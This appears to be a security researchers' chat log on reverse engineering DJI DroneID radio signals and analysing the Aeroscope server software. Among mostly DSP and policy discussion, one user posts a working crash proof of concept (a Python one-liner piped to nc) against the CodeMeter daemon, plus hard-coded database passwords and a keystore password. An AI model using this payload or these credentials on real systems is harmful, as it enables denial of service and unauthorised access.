[2022-04-11 06:42:27] hiddentty : Yes ! I confess that i wrote thoses line by entering in the subject, without certitudes. just my first observations of possibilites based on the believe of all the communication between RC and Aircraft was using an unic protocole, with a layer of encryption. But after readding the research made on this channel, it obvious for me now that is most subtile.

[2022-04-11 06:42:27] hiddentty : Yeap ! I confess that i wrote thoses line by entering in the subject, without certitudes. just my first observations of possibilites based on the believe of all the communication between RC and Aircraft was using an unic protocole, with a layer of encryption. But after readding the research made on this channel, it obvious for me now that is most subtile.

[2022-04-11 06:49:22] hiddentty : Yes, i agree with you, but i didn't expect from DJI a weaked use of security algorithm. i was more beting on an already known key or the knowledges of parameters influing the keygen.

[2022-04-11 06:50:33] hiddentty : Sorry i'm quite new and still make baby step in C and probably didn't get what you want to eplain with this.

[2022-04-11 07:00:02] hiddentty : The questions i would to ask, is, does the Aircraft is the only one to broadcast data used by Aeroscope devices, or also the RC does ? And after that's what the role are playing OOB for a regular flight. Does they are needed data or that can be cutted or falsified.

[2022-04-11 07:06:29] bin4ry : so i cannot see any broadcasts showing up on the AS when the drone is not powered on

[2022-04-11 07:06:57] bin4ry : which of course does not mean anything, but atleast the AS does not display something ;)

[2022-04-11 08:07:25] atlantic : The RC does not transmit drone id, only uplink packets. But if your phone/tablet has an enabled GPS, the app will transmit the GPS coordinates to the aircraft and the aircraft includes those app GPS coordinates in the drone id message.

[2022-04-11 08:07:25] atlantic : The RC does not transmit drone id, only uplink packets. But if your phone/tablet has an enabled GPS, the app will transmit the GPS coordinates to the aircraft and the aircraft includes those app GPS coordinates and time stamp in the drone id message.

[2022-04-11 09:04:34] tmbinc : Maybe stupid question - cross-correlation in time domain is multiplication in frequency domain, right? What we need is cross-correlation in frequency domain (correct?), so is there an equivalent time-domain operation that is simpler?

[2022-04-11 09:05:49] tmbinc : (* Multiplication with fft of time reversed conjugated signal.. doesn't matter complexity-wise as we could pre-calculate this anyway... not that it is difficult either.)

[2022-04-11 09:07:44] tmbinc : https://en.wikipedia.org/wiki/Convolution_theorem etc.

[2022-04-11 10:17:21] jan2642 : I was going to suggest a double fft but it seems that that is the equivalent of time inversion (times a constant): https://dsp.stackexchange.com/a/24881/4298

[2022-04-11 17:02:52] atlantic : i do cross correlation of the ZC in time domain, to find a packet.

[2022-04-11 20:14:37] hostile : FYI, Aeroscope in Russian is: АЭРОСКОП

[2022-04-12 02:05:49] proto : there's also a pretty crappy limit on how fast the pluto can move data between the arm (processing system - PS) and the fpga (programmable logic - PL). this issue hit ettus as well with their E series radios. i recall there was a talk at some sdr conference (maybe gnuradio) about how one company overcame that limitation with custom DMA drivers

[2022-04-12 02:09:10] proto : just to add another method: you can use a FIR filter or FFT filter (esp here since the filter length is a power of two). take the conjugate of the sequence you want to correlate against and set that as the filter taps. what you will get out is the same as the cross correlation of the sequence, but at least in the case of the fft filter, probably better performance than an normal element-wise dot product

[2022-04-12 02:12:55] hostile : so what is left to do @proto ? I know we losing you to real work soon.

[2022-04-12 02:14:27] proto : automatic freq correction (likely with either ZC or the cyclic prefix(es)) remainder of descrambling (just have the first symbol atm) turbo removal rate matching

[2022-04-12 02:15:41] proto : preparing to write up a wiki on how each step was done in my case

[2022-04-12 02:17:11] hostile : @icer I know shit got hectic for you... but ^

[2022-04-12 02:18:56] proto : was hoping the turbo and rate matching would be cake using openphy (https://github.com/ttsou/openphy) but the code seems to compile into individual `.o` files which you have to figure out dependencies for by hand. there's almost certainly an easy way to do this, but it ate an hour of my life just playing dependency whack-a-mole. i usually lean on `make VERBOSE=1` to see deps for each file, but that doesn't seem to do anything here :(

[2022-04-12 02:33:17] proto : example of the fft filter from gnuradio set to look for the first ZC sequence. note that it's normalized from the start which is wonderful. using arbitrary absolute thresholds for pattern detection sucks

[2022-04-12 02:34:38] proto : and if you delay the incoming samples (by `int(fft_size * 4) + long_cp_len + (short_cp_len * 3)` in my case) you can line the correlation up with the start of the burst :)

[2022-04-12 02:35:49] proto : otherwise you end up right after the first zc seq

[2022-04-12 03:44:45] proto : i'll be updating the wiki page (https://github.com/proto17/dji_droneid/wiki) a little at a time to document how i went about the DSP side of things. just uploaded the recording and burst measurement steps

[2022-04-12 05:49:42] atlantic : very intesting. I am not sure if i understand it already, but i like to learn this.

[2022-04-12 05:51:08] atlantic : ilke i said about the first symbol: this was DJI's gift to reverse engineering.

[2022-04-12 05:51:08] atlantic : like i said about the first symbol: this was DJI's gift to reverse engineering.

[2022-04-12 05:52:44] hostile :

[2022-04-12 05:53:21] hostile : Here is an updated version of the patches to gr-ieee802-11 that silence it, and only spit out DroneID serial number. (I'll do the rest of the fields later).

[2022-04-12 05:53:21] hostile : Here is an updated version of the patches to gr-ieee802-11 that silence it, and only spit out DroneDI serial number. (I'll do the rest of the fields later).

[2022-04-12 07:33:00] eingin : eingin joined the channel.

[2022-04-12 08:58:06] herasymyuk : herasymyuk joined the channel.

[2022-04-12 13:00:32] skynet : skynet joined the channel.

[2022-04-12 13:04:18] conchimnon : conchimnon joined the channel.

[2022-04-12 13:16:09] wechdamit : wechdamit joined the channel.

[2022-04-12 16:08:38] kirill17 : kirill17 joined the channel.

[2022-04-12 17:49:32] jan2642 : To come back to that correlation in frequency domain which would need F(F(x(t))) which is effectively x(-t): would it be correct to just multiple the signal with the ZC sequence (which is symmetrical so t or -t wouldn't make a difference), check if the result has a very clear peak and if it does, there's a match and the peak indicates the time offset ? Or is that oversimplification ? (My last signal processing course was in the nineties...

[2022-04-12 17:49:32] jan2642 : To come back to that correlation in frequency domain which would need F(F(x(t))) which is effectively x(-t): would it be correct to just multiply the signal with the ZC sequence (which is symmetrical so t or -t wouldn't make a difference), check if the result has a very clear peak and if it does, there's a match and the peak indicates the time offset ? Or is that oversimplification ? (My last signal processing course was in the nineties...)

[2022-04-12 17:49:32] jan2642 : To come back to that correlation in frequency domain which would need F(F(x(t))) which is effectively x(-t): would it be correct to just multiple the signal with the ZC sequence (which is symmetrical so t or -t wouldn't make a difference), check if the result has a very clear peak and if it does, there's a match and the peak indicates the time offset ? Or is that oversimplification ? (My last signal processing course was in the nineties...)

[2022-04-13 00:57:36] proto : here i am using the conjugate of the first zc sequence as a matched filter. the output of the top complex to mag squared will have a normalized cross correlation result between 0-1.0 with 1.0 being a perfect match

[2022-04-13 00:58:04] proto : oh derp, you said freq domain. my bad

[2022-04-13 02:44:48] proto : Just added burst extraction and coarse timing estimation to the wiki

[2022-04-13 02:44:48] proto : Just added burst extraction and coarse timing estimation to the wiki https://github.com/proto17/dji_droneid/wiki

[2022-04-13 02:48:00] proto : unfortunately i don't have a lot of time during the week to write wiki entries or continue work on the demod, so the info will trickle in. and i likely won't have much time this weekend either =\

[2022-04-13 03:31:16] b1tninja : the big thing is that the radio secret is generated using lrand48, but it's seeded with the number of seconds since the drone/rc was powered on

[2022-04-13 03:31:36] b1tninja : so there's only a few possibilities

[2022-04-13 22:50:17] zgvs2 : I have one in the mail and want to test this :) I just hope this m2 card works on my old dell :) very much looking forward to trying this. Do you also know where that droneid.py script you pasted output from earlier is available?

[2022-04-13 22:50:17] zgvs2 : I have one in the mail and want to test this :) I just hope this m2 card works on my old dell :) very much looking forward to trying this. Do you also know where that droneid.py script you pasted output from earlier is available? EDIT: I think I found the updated droneid.py script in the EnchancedWifi channel thanks :)

[2022-04-14 01:26:11] hostile : this is all I'm aware of re: public discussion of DUML and droneID. https://twitter.com/d0tslash/status/1511215231011368965

[2022-04-14 01:49:42] proto : just in case it's happening on ocusync as well, lightbridge had a "scrambler" on the DUML that it sent over the RF uplink. That "scrambler" was a random 8 bit value that was applied to all bytes. The funny part was that there was a known 0x55 (or was is 0xaa?) preamble to all DUML frames. So... that made guessing the "scrambler" pretty easy :rolling_on_the_floor_laughing: So, if there is any kind of encryption that creates a string of bytes that are XOR'd on the DUML it might be worth looking for something dumb like that

[2022-04-14 07:43:38] jackhmcd : jackhmcd joined the channel.

[2022-04-14 11:36:48] fredmicrowave :

[2022-04-14 13:24:36] mavic2pro666 : xiamen66 joined the channel.

[2022-04-15 01:24:15] hostile : lord that ain't cheap!

[2022-04-15 01:24:16] hostile : https://twitter.com/d0tslash/status/1514776524196524032?s=20&t=9pTTuH7IHW8oQTJcDjhekQ

[2022-04-15 01:24:41] hostile :

[2022-04-15 02:18:20] mavic2reverser : ??? what a joke

[2022-04-15 11:50:19] dkovar : Curious why you disagree with that? Gresco hosted all of the infrastructure in their own cloud that they stood up here in the U.S. (Full disclosure, I know people at Gresco and Mass State Police)

[2022-04-15 13:35:08] hostile : Didn't say I disagreed with it, but FWIW. I do have qualms about their use of an encrypted .WAR file. Just like the innards of the drones. We can not concretely say anything about the ability to call home IF the product chooses to when it is encrypted to high hell @dkovar

[2022-04-15 13:37:45] hostile : WEB-INF/classes/com/wibu/xpm/encrypted this Wibu encryption shit, doesn't help my concerns any. Maybe once we get it reversed. Also When I first got my Aeroscope unit, the same narrative was present "It doesn't call home ever"! The literal first fucking thing it did when I plugged it in, was call home to DJI servers. Brendan and I talked about it, he was embarassed, and it was ultimately a feature that was removed. We can only ever speak to a snapshot in time, and only to the decrypted. It is that simple IMHO.

[2022-04-15 13:39:06] hostile : So... lets decrypt the .war function and talk further.

[2022-04-15 13:49:20] hostile : But hey. I'd also be willing to consume any due diligence security audit they did against Aeroscope, assuming they did one, I've not seen one historically out of anyone @dkovar

[2022-04-15 13:49:41] hostile : letter of attestation from a pentesting company, etc.

[2022-04-15 13:51:21] hostile : Also love this "In light of the fact that the manual is not completed, the withholding of these records is necessary in order for the Department to perform its proper governmental function of producing a working manual for the effective detection of drones." https://farewell-ladmin.com/how-the-mass-state-police-can-monitor-drones/

[2022-04-15 14:11:48] hostile : now ya done made me order a USB stick so I can get the codemeter daemon to launch so I can exploit it lol

[2022-04-15 14:11:54] hostile :

[2022-04-15 14:36:23] dragorn : Technically the state-side admins could set up proper egress filtering and logging and catch it if it does. Will they? Who knows. Also depends how it needs to reach out to the world for normal operations.

[2022-04-15 15:37:12] mavic2reverser : @dragorn I wonder how it receives map tiles, unless they're offline. if they did apply filtering, they'd at least have to let the map tiles through

[2022-04-15 15:41:43] dragorn : yep. no idea. might have to run its own local map server, too, for eula w/ the map sites

[2022-04-15 16:43:06] dkovar : I've seen all sorts of really cool exfil techniques while doing incident response engagements. Absolutely possible to exfil Aeroscope data if someone were so inclined. But, why bother? Really, what sensitive information is in there? There is business intelligence value, but is it valuable enough to take the risk? And, given some of the infrastructure supporting Aeroscope deployments, it would be far easier to hack into the supporting infrastructure and take everything.

[2022-04-15 16:45:35] dkovar : I doubt anyone is going to invest time in an Aeroscope security audit. No one really cares. They generally assume that the data is "secure enough" and get on with things. There are a lot of CUAS integrators building nationwide networks that are, or will, gather far more interesting information than DJI Aeroscopes, and they are probably not paying enough attention to their cyber defenses.

[2022-04-15 17:33:07] hostile : "But, why bother? Really, what sensitive information is in there?" patterns of life are interesting none the less, as are one ones entitlement to privacy. Also, we've been here before. https://www.eff.org/deeplinks/2019/03/heres-why-you-cant-trust-what-cops-and-companies-claim-about-automated-license

[2022-04-15 17:41:27] hostile : Back to the encryption discussion... I've certainly not forgotten that we discovered JPush in the Go App for example, and similarly that SLiu (aka Nobody) had integrated GPS triggers into it. There are a number of special logic conditions that could be hidden before illicit, or *analytical*, marketing data, or bug reports (I'm being generous here) decided they needed to make it back home for some reason. The track record simply leaves me cautious when folks make claims like the one found in the bid above. Cuz really it isn't an assertive statement anyone can make right now. Jpush for example had the ability to remain silent until a certain GPS location came in view. Sure... could have been only for targeted marketing, or regionalized patching, etc. coulda also been used for other shit. I'm just cautious to endorse comments like "There is NO connectivity to DJI and/or its servers and/or it's agents"

[2022-04-15 17:41:27] hostile : Back to the encryption discussion... I've certainly not forgotten that we discovered JPush in the Go App for example, and similarly that SLiu (aka Nobody) had integrated GPS triggers into it. There are a number of special logic conditions that could be hidden before illicit, or *analytical*, marketing decided it needed to make it back home for some reason. The track record simply leaves me cautious when folks make claims like the one found in the bid above. Cuz really it isn't an assertive statement anyone can make right now. Jpush for example had the ability to remain silent until a certain GPS location came in view. Sure... could have been only for targeted marketing, or regionalized patching, etc. coulda also been used for other shit. I'm just cautious to endorse comments like "There is NO connectivity to DJI and/or its servers and/or it's agents"

[2022-04-15 17:41:27] hostile : Back to the encryption discussion... I've certainly not forgotten that we discovered JPush in the Go App for example, and similarly that SLiu had integrated GPS triggers into it. There are a number of special logic conditions that could be hidden before illicit, or *analytical*, marketing decided it needed to make it back home for some reason. The track record simply leaves me cautious when folks make claims like the one found in the bid above. Cuz really it isn't an assertive statement anyone can make right now. Jpush for example had the ability to remain silent until a certain GPS location came in view. Sure... could have been only for targeted marketing, or regionalized patching, etc. coulda also been used for other shit. I'm just cautious to endorse comments like "There is NO connectivity to DJI and/or its servers and/or it's agents"

[2022-04-15 17:47:03] hostile : "it would be far easier to hack into the supporting infrastructure and take everything" I'm not half convinced these boxes can't be used as a jump off point into other infrastructure to that point.

[2022-04-15 17:47:48] hostile : wondering IF you accidentally are stupid enough to leave one exposed, how easy it is to pivot.

[2022-04-15 17:47:50] hostile : ```./WEB-INF/classes/redis.local.properties:#redis.password=125587962 ./WEB-INF/classes/redis.local.properties:redis.password=redispass ./WEB-INF/classes/mysql.local.properties:flyingmgr.password=test1234 ./WEB-INF/classes/mysql.local.properties:#flyingmgr.password=3r2pu4rh ./WEB-INF/classes/redis.properties:redis.password=redispass ./WEB-INF/classes/mysql.properties:flyingmgr.password=test1234```

[2022-04-15 17:47:57] hostile : cuz some of this shit is lulz worthy.

[2022-04-15 17:48:20] hostile : Assuming you can't change passwords that are hard coded into the .war file for example. *shrug*

[2022-04-15 17:49:10] hostile : or if there is a magic RF packet you can send that can be leveraged for access. Lots of questions... no time to seek answers, nor bypass encryption for a full view

[2022-04-15 17:49:23] hostile : only time to armchair quarterback potential scenarios

[2022-04-15 18:18:58] hostile : It is kinda interesting to think that there was a huge push to get public safety to use DJI drones (very successful marketing push one may say). What are the ramifications of your own gear, and patterns of use turning up in your own system, and potentially getting exposed? Fun questions that we may eventually learn the answers to. https://enterprise.dji.com/public-safety

[2022-04-15 19:36:24] droneuser : @hostile where on the aeroscope did you get that encrypted war file?

[2022-04-15 20:35:01] hostile : non portable version

[2022-04-15 20:57:14] hostile : httpd is also encrypted

[2022-04-15 20:58:15] dkovar : Public safety willingly bought DJI drones because they provided the best capabilities for the price. 3DR, GoPro and others failed to compete with DJI and no good options were left.

[2022-04-15 20:58:57] dkovar : Public safety continues to buy DJI for that reason.

[2022-04-15 20:59:46] hostile : lowest bidder situations have always been ripe for exploitation in various scenarios.Excuses need not apply. It is all *understood*.

[2022-04-15 21:02:46] hostile : don't forget too many states were given DJI gear on loan IIRC 45 different agencies I think it was?

[2022-04-15 21:03:37] hostile : https://enterprise-insights.dji.com/blog/us-covid-19-relief-program-update

[2022-04-15 21:03:48] hostile : ```Today, we’re pleased to announce we are distributing 100 drones to 45 police, fire and public safety organizations in 22 states. ```

[2022-04-15 21:04:28] hostile : (Skydio did the same FWIW)

[2022-04-15 21:11:10] hostile : also... lest we not forget the poorly written ICE document.

[2022-04-15 21:11:13] hostile :

[2022-04-15 21:12:35] hostile : I always thought the use of "target" was apt.

[2022-04-15 21:12:37] konraditurbe : And what if the lowest bidder has to be supplying a dji drone .. because the tender indirectly asks for one.

[2022-04-15 21:13:42] konraditurbe : Some of the specs in the tenders are copied from DJI's spec sheet. There was an article about this. trying to find it.

[2022-04-15 21:14:20] hostile : Slanted bid wording has ALWAYS been a thing

[2022-04-15 21:15:27] hostile : But yeah when your Bid says "AeroScope hardware, monitoring and tracking software", and not "CUAS platform". You get exactly what you ask for. https://www.governmentbids.com/government-bid-opportunity-public-14870416-en.jsa

[2022-04-15 21:18:20] coldflake : Decrypt key is in the firmware 100%

[2022-04-15 21:20:38] hostile : they using WiBu my man

[2022-04-15 21:20:43] hostile : hadware dongles

[2022-04-15 21:26:12] the_lord : DJI don't provide hardware dongle to dealers when they purchase the local deployment software, the dealers get wibu license files

[2022-04-15 21:26:46] hostile : hah nice

[2022-04-15 21:27:28] hostile : surprised they went with the weaker option

[2022-04-15 21:27:33] hostile : well cheaper I guess

[2022-04-15 21:29:03] the_lord : so they can get more profit

[2022-04-15 21:29:38] the_lord : if they find opensource solution they will use it ;)

[2022-04-16 01:55:39] hostile : now I gotta figure out what the daemon was complaining about when it was trying to launch. =]

[2022-04-16 22:13:08] nopexecutor : @proto did you get all the details already? Based on github readme I can see you are past descrambling, FEC and some data interpretation, right?

[2022-04-16 22:21:56] nopexecutor : if spoofing is the main target, good rx chain / synchronization is probably not that important... just to have it good enough to understand the details of the protocol and be able to verify the TX chain...

[2022-04-16 22:22:47] nopexecutor : if you are still missing ZC params - try u=600 and 147

[2022-04-16 22:22:47] nopexecutor : if you are still missing ZC params - try u=600 and 147 EDIT: just found those values used already in the github repo ;)

[2022-04-16 23:12:45] nopexecutor : so maybe you already have all the blocks needed...

[2022-04-17 04:27:06] hostile : this makes me smile how the default port mapping works on the "local" version.

[2022-04-17 05:08:19] hostile : LOLOL this CodeMeter daemon is trash

[2022-04-17 05:08:23] hostile : ```$ python3 -c "import os,struct; size=0x100; os.write(1,b'samc'+struct.pack('<LHHL',size+2,0x71,1,0)+b'\xA2\x05'+b'A'*size)" | nc 10.0.0.30 22350 | xxd 00000000: 7361 6d63 0801 0000 7100 0100 0000 0000 samc....q....... 00000010: 0000 0000 6800 0000 4141 4141 4141 4141 ....h...AAAAAAAA 00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000050: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000060: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000070: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000080: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000090: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000a0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000b0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000c0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000d0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000e0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000f0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000100: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000110: 4141 4141 4141 4141 AAAAAAAA ```

[2022-04-17 05:08:23] hostile : ``` $ python3 -c "import os,struct; size=0x100; os.write(1,b'samc'+struct.pack('<LHHL',size+2,0x71,1,0)+b'\xA2\x05'+b'A'*size)" | nc 10.0.0.30 22350 | xxd 00000000: 7361 6d63 0801 0000 7100 0100 0000 0000 samc....q....... 00000010: 0000 0000 6800 0000 4141 4141 4141 4141 ....h...AAAAAAAA 00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000050: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000060: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000070: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000080: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000090: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000a0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000b0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000c0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000d0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000e0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 000000f0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000100: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000110: 4141 4141 4141 4141 AAAAAAAA ```

[2022-04-17 05:08:58] hostile : ``` 2022-04-17 01:07:48: API Event WB0104 (INTERNAL ORGANISATION, AG) occurred (returned to caller) 2022-04-17 01:07:48: API Event WB104 (INTERNAL ORGANISATION) occurred (returned to caller) malloc(): corrupted top size Aborted (core dumped) ```

[2022-04-17 05:09:23] hostile : ``` $ python3 -c "import os,struct; size=0x110; os.write(1,b'samc'+struct.pack('<LHHL',size+2,0x71,1,0)+b'\xA2\x05'+b'A'*size)" | nc 10.0.0.30 22350``` == b00m

[2022-04-17 05:09:32] hostile : @icer ...

[2022-04-17 05:10:59] hostile : PoC's from the tenable writeup. https://www.tenable.com/security/research/tra-2021-24

[2022-04-17 05:23:46] atlantic : what is the "open service"?

[2022-04-17 05:31:05] hostile : unclear. also wonder what this was ?

[2022-04-17 05:31:15] hostile : https://github.com/lt594963425/ArouteDemo

[2022-04-17 05:38:49] hostile : @atlantic re: open service

[2022-04-17 05:38:54] hostile : ``` open_service: image: aeroscope/aeroscope_open_service:7c52d99c depends_on: - mysql - mongodb - redis - fluentd ports: - "8090:8090" volumes: - /etc/group:/etc/group:ro - /etc/passwd:/etc/passwd:ro - /etc/localtime:/etc/localtime hostname: open_service environment: - MONGO_INITDB_ROOT_USERNAME=$mongodb_usr - MONGO_INITDB_ROOT_PASSWORD=$mongodb_pwd - MYSQL_ROOT_PASSWORD=$mysql_pwd networks: - aeroscope_bridge logging: driver: fluentd options: tag: aeroscope.open_service ```

[2022-04-17 07:34:16] atlantic : android app that queries an Aeroscope server via webapi and displays it on a map?

[2022-04-17 07:35:57] atlantic : open service: depends on log and databases. then it must be the chinese backdoor to get all your data ?

[2022-04-17 07:35:57] atlantic : open service: depens on log and databases. then it must be the chinese backdoor to get all your data ?

[2022-04-17 07:41:07] atlantic : at least they are "open" about it, they could have give it a more covert name.

[2022-04-17 08:36:09] soilder76 : soilder76 joined the channel.

[2022-04-17 14:33:33] hostile : TBH @atlantic after going back through the AWS dump from years ago I suspect at this point Supervisor program was actually an early version of FlightHub / Aeroscope that they were using on customer log files. And TBH I suspect they still use it on "volunteered" log files. Now, on the other hand the practice of using piss poor default passwords, and leaving keys laying around to be *found* may not be directly malicious, but may also certainly be by design. If you can encourage folks to use your leaky product, and they are too stupid for due diligence, it is in your favor in both cases sales wise, and data collection wise.

[2022-04-17 14:35:10] hostile : DJI engineering legit argued with me when I was at D13 saying that we did NOT crack the encryption on lightbridge, and that it was impossible for use to inject DUML frames. The ramifications of course are full compromise of C2 stream. Same thing with Enhanced Wifi & WEP, they've known of this *feature* for at least 5 years now, and have chosen to do nothing about it. It may be in *someone's* favor to have those links readily crackable, or perhaps it isn't. Who actually knows.

[2022-04-17 14:36:37] hostile : I discussed my opinion on their log file consumption around this time last years. https://www.youtube.com/watch?v=_zWGBfPNTPU&t=1832s

[2022-04-17 14:37:31] hostile : even going back to the many times historically that the sync data button gets desynch'd and flips it self to on silently. *shrug*.

[2022-04-17 14:38:41] hostile : They obviously can't as readily, and blatantly get access to that same data as they could before because everyone is watching. I'm still a firm believer that SecNeo for one hides logic that they do not seek for us to see. Until we CAN see, I'll maintain that stance based on what I've already seen from them.

[2022-04-17 14:40:48] hostile : But yes I 100% believe how ever they obtain log files, volunteer, accidental on purpose, or directly taken in some cases they absolutely analyze the hell out of them for at the very least business logic. And as poorly as this ICE report was written, I think there was some reality at the core. https://info.publicintelligence.net/ICE-DJI-China.pdf

[2022-04-17 14:41:15] hostile : We've missed the boat on catching them "red handed" with some of this stuff though. They have to be much more covert by nature now, simply due to all the scrutiny.

[2022-04-17 14:44:04] hostile : At this point much of this is based on correlation. Every little shred you can get. I'd openly call anyone a fool that didn't recognize that DJI is acting as a data broker. https://www.youtube.com/watch?v=wqn3gR1WTcA

[2022-04-17 14:44:04] hostile : At this point much of this is based on correlation. Every little shred you can get. I'd openly call anyone a fool that didn't recognize that DJI is acting as a data broker (even if just for the .cn government). https://www.youtube.com/watch?v=wqn3gR1WTcA

[2022-04-17 15:54:20] hostile : also had forgotten about this

[2022-04-17 15:54:27] hostile :

[2022-04-17 15:54:40] hostile :

[2022-04-17 18:38:58] skyninja : In the server software there is this server.jks and serverTrust.jks. $ keytool -list -keystore server.jks Enter keystore password: Keystore type: JKS Keystore provider: SUN Your keystore contains 1 entry aeroscope_local_server, Oct 2, 2018, PrivateKeyEntry, Certificate fingerprint (SHA-256): 2C:80:D6:06:E2:7D:2C:5B:79:E7:C7:CB:2F:DF:F1:C2:DF:CD:C7:73:3B:79:EE:13:F4:8B:9E:99:07:3F:54:91 $ keytool -list -keystore serverTrust.jks -storepass aeroscope Keystore type: JKS Keystore provider: SUN Your keystore contains 1 entry ca, Oct 2, 2018, trustedCertEntry, Certificate fingerprint (SHA-256): 2D:6E:D5:67:7D:66:63:C1:67:1C:30:9A:B2:4B:48:A5:81:96:91:18:C6:41:2B:AE:C2:10:8E:02:79:3C:C7:0F

[2022-04-17 18:40:27] skyninja : the private key from server.jks and the certificate in serverTrust.jks do not seem to match. I assumed hte private key from server.jks was the private key for the certificate in serverTrust.jks.

[2022-04-17 18:41:00] skyninja : $ openssl pkey -check -in aeroscope_local_server.key -pubout Key is valid -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA179h9CTv/glEg8l46wCS Wm01cHBKo5pNBax++W7l28HH42oCH7PNvjHRD8zifiG3ER766DduNNYsBBhpXN0B pO9JvCk9a/Zi89EayKX1dh+w4xv59Vdgb8rOpYe2n5mjAL6yNB6x4/y+wmsE2Vno 0awO6jAOxuGjVdVPATJFCSV2uqDwIxFkIUWf5fcNF70Dg1UkPbl5WS6HIS40Upol FGOulSFzgBayEXQUWAD9Z5Z9CaLpsOt0SfWlncUlpMZ9lzfuppRFkLTjj9l4kAxO mQYgo6TfTdeCdKG5YZ9fcPD3Aa2ye216Fc0xqRBMTF1cysP8YYHChVT0QQF4DCyB QwIDAQAB -----END PUBLIC KEY-----

[2022-04-17 18:41:12] skyninja : $ openssl x509 -in ca.pem -noout -pubkey -----BEGIN PUBLIC KEY----- MIIEIjANBgkqhkiG9w0BAQEFAAOCBA8AMIIECgKCBAEAww6RSTakZ9HaJb2tDaXJ CHG3NWXvWM4riyBs1L5ruR8Y3dzBottMYZVeLDqttWX/O+3hq71Ego24znRJd5xR 05o+Ctn6hZoabfIVfk0Ksj+bjeqA8FTZrwIZCEeA2OqGXWlsTyNgJdiIBHNcaRE9 9FGKWJ3hD3eW2vlSFK01FboBRwH92VHQ3hPqUvmCwXUVnVR7YNjSF/PrjZdo5W4d 1f49CH1c/qwbGSn/GfToIXmtNqnqfvG8221+Hn3FrrInTSvcXxb2lfsTaNEIM4Iu Kb1zfYbwTZu/qPsjA8VEOdNgeoc196Ut3v2HS6Nci9CcpfDhskrQq71MwMRaox/h d+r3vH4SrFoiwzhVFDHJ129KD5IpE4TMLSNAAQk5J+Lpksv9HKg+5JvXTTlF8E7E 5kOc358U5Zx9J5Cvf1o7UyBFPKTr79QmnsTAj9n7VudQjNUCX977syKGFx0DrDOL pdlWG7D8ZleELwtqzeP0VdY00gLAL7+jRhmQlGH6NOmsVQ622/Z9EmWdmc/6pCa4 jAT5u9gjCnCul76IK6cvXcpLF5H1hByH/UCjPKLic4e3p7O6SAa1ndgCtBTvCrgo 9UAGRuUELFBSsujoQQ2l9sHOpOFNxU5Hz2lqr4pD1BO35m9O2Q7zvX09u7t8Te1t X4RnN9G71U+vlXDFizFY+ty5R4gWPdYU1IKiabL7+dns6nhDEZAmO1VbmvGt9s9L JXaClkZL145KGZ9Q075E8QmR2YtxftVmjeFpiPn2wfChNGVF+/d96u2Cvnyv9e0p ZjE2759da5kgxQrUES69HLnJLEtMqeJO9wiE4BLBnckPeHJYSwUmb7hUMcv8TvBd vubweKCwyQoRV9OLGXyfpTj5JiMHVM5BuF23HAknP3AwIfxUzQElftZy5fuLTlQI GFJzXl+vGX3hlKmJJj7IuefWMMNDLvc1brVLI8agfdQcFusdA9dMT+9QpZVVKl0K F/rzGAr/4hOA9gL1cdlxKKQB+mN7cCoGbwr6yGLrFYB+8Fa30b95v71eQlh5ZPnn 9z4VT47iRlLz5HHHRn9VGQ0EvD23w14qaYFs8OZF/konvquPL7J8Uf9VltxmTWo7 3GvnJKoK8aul1syvxFiRjtY6ivY7CBBYGUZzESEnAE5lt1t08AdnfNWn8FCc5KDK fF0Cvmz3nHlhtJumD3q9RUXUjW6pHaxFqgOJvJR8+n9SEUuGKcsM6Jay+te0wvAH qXgWB1OTSqOHmBOvBoGBSMWTC33TMhPiBFs4WMQWNbmvOErGn5yhPkuV2lHzRC5w ccAGubrEY4KiCMEeJfsUqWya6dcKujJGmiwjCSsRxWo6P5cRA4v4Fr2TC+CF9KfP jQIDAQAB -----END PUBLIC KEY-----

[2022-04-17 18:41:33] skyninja : they are not even similair length. Am I doing something wrong?

